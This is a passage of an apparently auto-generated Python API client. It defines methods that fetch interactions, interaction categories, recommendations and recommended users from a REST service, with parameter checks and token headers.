(optional) :param str interaction_status: /* Interaction status 1) ALL 2) UNREPLIED 3) REPLIED 4) CLOSED */ (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_type: Interaction Type :param int category_id: categoryId :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionList If the method is called asynchronously, returns the request thread. 
""" all_params = ['interaction_status', 'start', 'end', 'requester_id', 'client_token', 'interaction_type', 'category_id', 'association', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_friends_interactions" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_status' is set if ('interaction_status' not in params) or (params['interaction_status'] is None): raise ValueError("Missing the required parameter `interaction_status` when calling `get_friends_interactions`") # verify the required parameter 'start' is set if ('start' not in params) or (params['start'] is None): raise ValueError("Missing the required parameter `start` when calling `get_friends_interactions`") # verify the required parameter 'end' is set if ('end' not in params) or (params['end'] is None): raise ValueError("Missing the required parameter `end` when calling `get_friends_interactions`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `get_friends_interactions`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `get_friends_interactions`") resource_path = '/interactions/friends'.replace('{format}', 'json') path_params = {} query_params = {} if 'interaction_status' in params: query_params['interactionStatus'] = params['interaction_status'] if 'interaction_type' in params: query_params['interactionType'] = params['interaction_type'] if 'category_id' in params: query_params['categoryId'] = params['category_id'] if 'association' in params: 
query_params['association'] = params['association'] if 'start' in params: query_params['start'] = params['start'] if 'end' in params: query_params['end'] = params['end'] if 'fields' in params: query_params['fields'] = params['fields'] header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionList', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def get_interaction(self, interaction_id, requester_id, client_token, **kwargs): """ Get interaction by id Returns the interaction by id This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_interaction(interaction_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. 
Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.get_interaction_with_http_info(interaction_id, requester_id, client_token, **kwargs) else: (data) = self.get_interaction_with_http_info(interaction_id, requester_id, client_token, **kwargs) return data def get_interaction_with_http_info(self, interaction_id, requester_id, client_token, **kwargs): """ Get interaction by id Returns the interaction by id This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_interaction_with_http_info(interaction_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. 
Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_id', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_interaction" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `get_interaction`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `get_interaction`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `get_interaction`") resource_path = '/interactions/{interactionId}'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] query_params = 
{} if 'fields' in params: query_params['fields'] = params['fields'] header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteraction', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def get_interaction_categories(self, start, end, requester_id, client_token, **kwargs): """ Get the list of interaction categories Returns the list of interaction categories This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_interaction_categories(start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. 
Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_type: Interaction Type :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionCategoryList If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.get_interaction_categories_with_http_info(start, end, requester_id, client_token, **kwargs) else: (data) = self.get_interaction_categories_with_http_info(start, end, requester_id, client_token, **kwargs) return data def get_interaction_categories_with_http_info(self, start, end, requester_id, client_token, **kwargs): """ Get the list of interaction categories Returns the list of interaction categories This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_interaction_categories_with_http_info(start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. 
Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_type: Interaction Type :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionCategoryList If the method is called asynchronously, returns the request thread. """ all_params = ['start', 'end', 'requester_id', 'client_token', 'interaction_type', 'association', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_interaction_categories" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'start' is set if ('start' not in params) or (params['start'] is None): raise ValueError("Missing the required parameter `start` when calling `get_interaction_categories`") # verify the required parameter 'end' is set if ('end' not in params) or (params['end'] is None): raise ValueError("Missing the required parameter `end` when calling `get_interaction_categories`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `get_interaction_categories`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `get_interaction_categories`") resource_path = 
'/interactions/categories'.replace('{format}', 'json') path_params = {} query_params = {} if 'interaction_type' in params: query_params['interactionType'] = params['interaction_type'] if 'association' in params: query_params['association'] = params['association'] if 'start' in params: query_params['start'] = params['start'] if 'end' in params: query_params['end'] = params['end'] if 'fields' in params: query_params['fields'] = params['fields'] header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionCategoryList', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def get_interactions_for_user(self, interaction_status, start, end, requester_id, client_token, **kwargs): """ Get list of all interactions visible to the user Returns the list of all interactions visible to the user This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. 
>>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_interactions_for_user(interaction_status, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str interaction_status: /* Interaction status 1) ALL 2) UNREPLIED 3) REPLIED 4) CLOSED */ (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param int category_id: categoryId :param str interaction_type: Interaction Type :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionList If the method is called asynchronously, returns the request thread. 
""" kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.get_interactions_for_user_with_http_info(interaction_status, start, end, requester_id, client_token, **kwargs) else: (data) = self.get_interactions_for_user_with_http_info(interaction_status, start, end, requester_id, client_token, **kwargs) return data def get_interactions_for_user_with_http_info(self, interaction_status, start, end, requester_id, client_token, **kwargs): """ Get list of all interactions visible to the user Returns the list of all interactions visible to the user This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_interactions_for_user_with_http_info(interaction_status, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str interaction_status: /* Interaction status 1) ALL 2) UNREPLIED 3) REPLIED 4) CLOSED */ (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. 
Please generate it from the Applications section under the Production & Sandbox tabs (required) :param int category_id: categoryId :param str interaction_type: Interaction Type :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionList If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_status', 'start', 'end', 'requester_id', 'client_token', 'category_id', 'interaction_type', 'association', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_interactions_for_user" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_status' is set if ('interaction_status' not in params) or (params['interaction_status'] is None): raise ValueError("Missing the required parameter `interaction_status` when calling `get_interactions_for_user`") # verify the required parameter 'start' is set if ('start' not in params) or (params['start'] is None): raise ValueError("Missing the required parameter `start` when calling `get_interactions_for_user`") # verify the required parameter 'end' is set if ('end' not in params) or (params['end'] is None): raise ValueError("Missing the required parameter `end` when calling `get_interactions_for_user`") # verify the 
required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `get_interactions_for_user`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `get_interactions_for_user`") resource_path = '/interactions'.replace('{format}', 'json') path_params = {} query_params = {} if 'interaction_status' in params: query_params['interactionStatus'] = params['interaction_status'] if 'category_id' in params: query_params['categoryId'] = params['category_id'] if 'interaction_type' in params: query_params['interactionType'] = params['interaction_type'] if 'association' in params: query_params['association'] = params['association'] if 'start' in params: query_params['start'] = params['start'] if 'end' in params: query_params['end'] = params['end'] if 'fields' in params: query_params['fields'] = params['fields'] header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionList', auth_settings=auth_settings, 
callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def get_recommend_interactions(self, start, end, requester_id, client_token, **kwargs): """ Get list of recommended interactions Returns the list of recommended interactions This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_recommend_interactions(start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_type: interactionType :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionList If the method is called asynchronously, returns the request thread. 
""" kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.get_recommend_interactions_with_http_info(start, end, requester_id, client_token, **kwargs) else: (data) = self.get_recommend_interactions_with_http_info(start, end, requester_id, client_token, **kwargs) return data def get_recommend_interactions_with_http_info(self, start, end, requester_id, client_token, **kwargs): """ Get list of recommended interactions Returns the list of recommended interactions This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_recommend_interactions_with_http_info(start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_type: interactionType :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionList If the method is called asynchronously, returns the request thread. 
""" all_params = ['start', 'end', 'requester_id', 'client_token', 'interaction_type', 'association', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_recommend_interactions" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'start' is set if ('start' not in params) or (params['start'] is None): raise ValueError("Missing the required parameter `start` when calling `get_recommend_interactions`") # verify the required parameter 'end' is set if ('end' not in params) or (params['end'] is None): raise ValueError("Missing the required parameter `end` when calling `get_recommend_interactions`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `get_recommend_interactions`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `get_recommend_interactions`") resource_path = '/interactions/recommend'.replace('{format}', 'json') path_params = {} query_params = {} if 'interaction_type' in params: query_params['interactionType'] = params['interaction_type'] if 'association' in params: query_params['association'] = params['association'] if 'start' in params: query_params['start'] = params['start'] if 'end' in params: query_params['end'] = params['end'] if 'fields' in params: query_params['fields'] = params['fields'] header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: 
header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionList', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def get_recommended_interactins_from_db(self, user_id, start, end, requester_id, client_token, **kwargs): """ Get list of recommended interactions from DB Returns the list of recommended interactions from DB This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_recommended_interactins_from_db(user_id, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int user_id: User Id whose recommended interactions want to get (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. 
Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_type: Interaction Type :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionList If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.get_recommended_interactins_from_db_with_http_info(user_id, start, end, requester_id, client_token, **kwargs) else: (data) = self.get_recommended_interactins_from_db_with_http_info(user_id, start, end, requester_id, client_token, **kwargs) return data def get_recommended_interactins_from_db_with_http_info(self, user_id, start, end, requester_id, client_token, **kwargs): """ Get list of recommended interactions from DB Returns the list of recommended interactions from DB This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_recommended_interactins_from_db_with_http_info(user_id, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. 
(optional) :param int user_id: User Id whose recommended interactions want to get (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_type: Interaction Type :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionList If the method is called asynchronously, returns the request thread. 
""" all_params = ['user_id', 'start', 'end', 'requester_id', 'client_token', 'interaction_type', 'association', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_recommended_interactins_from_db" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'user_id' is set if ('user_id' not in params) or (params['user_id'] is None): raise ValueError("Missing the required parameter `user_id` when calling `get_recommended_interactins_from_db`") # verify the required parameter 'start' is set if ('start' not in params) or (params['start'] is None): raise ValueError("Missing the required parameter `start` when calling `get_recommended_interactins_from_db`") # verify the required parameter 'end' is set if ('end' not in params) or (params['end'] is None): raise ValueError("Missing the required parameter `end` when calling `get_recommended_interactins_from_db`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `get_recommended_interactins_from_db`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `get_recommended_interactins_from_db`") resource_path = '/interactions/{userId}/recommendedInteractions'.replace('{format}', 'json') path_params = {} if 'user_id' in params: path_params['userId'] = params['user_id'] query_params = {} if 'interaction_type' in params: query_params['interactionType'] = params['interaction_type'] if 'association' in params: query_params['association'] = params['association'] if 'start' in params: query_params['start'] = 
params['start'] if 'end' in params: query_params['end'] = params['end'] if 'fields' in params: query_params['fields'] = params['fields'] header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionList', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def get_recommended_users_from_db(self, interaction_id, start, end, requester_id, client_token, **kwargs): """ Get list of recommended Users from DB Returns the list of recommended users from DB This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_recommended_users_from_db(interaction_id, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. 
(optional) :param int interaction_id: interactionId (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)userId 2)firstName 3)lastName 4)profileImage **A) Available values-** 1)userId 2)firstName 3)lastName 4)emailId 5)profileImage 6)birthDate */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseUserList If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.get_recommended_users_from_db_with_http_info(interaction_id, start, end, requester_id, client_token, **kwargs) else: (data) = self.get_recommended_users_from_db_with_http_info(interaction_id, start, end, requester_id, client_token, **kwargs) return data def get_recommended_users_from_db_with_http_info(self, interaction_id, start, end, requester_id, client_token, **kwargs): """ Get list of recommended Users from DB Returns the list of recommended users from DB This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_recommended_users_from_db_with_http_info(interaction_id, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. 
(optional) :param int interaction_id: interactionId (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)userId 2)firstName 3)lastName 4)profileImage **A) Available values-** 1)userId 2)firstName 3)lastName 4)emailId 5)profileImage 6)birthDate */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseUserList If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_id', 'start', 'end', 'requester_id', 'client_token', 'association', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_recommended_users_from_db" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `get_recommended_users_from_db`") # verify the required parameter 'start' is set if ('start' not in params) or (params['start'] is None): raise ValueError("Missing the required parameter `start` when calling `get_recommended_users_from_db`") # verify the required parameter 'end' is set if ('end' not in params) or (params['end'] is None): raise ValueError("Missing the required parameter `end` when calling `get_recommended_users_from_db`") # verify the required parameter 'requester_id' is set if 
('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `get_recommended_users_from_db`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `get_recommended_users_from_db`") resource_path = '/interactions/{interactionId}/recommendedUsers'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] query_params = {} if 'association' in params: query_params['association'] = params['association'] if 'start' in params: query_params['start'] = params['start'] if 'end' in params: query_params['end'] = params['end'] if 'fields' in params: query_params['fields'] = params['fields'] header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseUserList', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def get_responses(self, interaction_id, start, end, requester_id, client_token, **kwargs): """ Get list of 
